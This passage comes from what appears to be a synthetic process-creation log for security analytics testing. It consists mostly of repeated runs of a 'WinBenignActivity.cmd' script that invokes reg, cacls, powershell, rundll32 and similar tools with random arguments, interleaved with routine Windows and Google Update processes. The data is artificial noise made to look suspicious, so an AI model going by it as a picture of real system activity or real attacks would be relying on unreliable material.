\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"rundll32  \\\\32641\\\\32360.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14433 c:\\\\temp\\\\8937\\\\1760.ps1\",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 11 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 20 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" Scan -ScheduleJob -ScanTrigger 55\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 13 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /12420\",\"ping  127.0.0.1 -n 19 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 5 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29637\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29637\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962 /15074\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3232\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25774 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\28790\\\\506.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9748 c:\\\\temp\\\\3830\\\\20559.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 8 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -11581 \",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 29 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\5728\\\\16265.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 22 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 /16911\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -27468\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23226 \",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"rundll32  \\\\5914\\\\3172.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15059 c:\\\\temp\\\\32400\\\\30510.ps1\",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 25 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 32 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 16 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /7488\",\"ping  127.0.0.1 -n 20 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -3759\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3759\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 /27802\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2134\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4277 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\25124\\\\21095.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32665 c:\\\\temp\\\\25833\\\\20704.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 3 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 10 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -417 \",\"ping  127.0.0.1 -n 10 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 13 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 22 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\15930\\\\31294.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 20 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358 /18002\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6872\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22331 \",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"rundll32  \\\\24611\\\\27906.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9507 c:\\\\temp\\\\32250\\\\13043.ps1\",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 6 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 26 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 18 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /2556\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10650\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10650\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149 /8068\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2525\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2780\\\" \\\"1640\\\" \\\"1628\\\" \\\"1644\\\" \\\"0\\\" \\\"0\\\" \\\"1648\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21826 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\10012\\\\26584.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4605 c:\\\\temp\\\\20191\\\\30968.ps1\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3760\\\" \\\"1628\\\" \\\"1608\\\" \\\"1632\\\" \\\"0\\\" \\\"0\\\" \\\"1636\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 21 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22022 \",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\26132\\\\13555.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 18 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958 /15519\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -8210\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21175 \",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"rundll32  \\\\21814\\\\15398.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3521 c:\\\\temp\\\\18194\\\\26595.ps1\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 21 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /30391\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -17541\",\"ping  127.0.0.1 -n 25 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  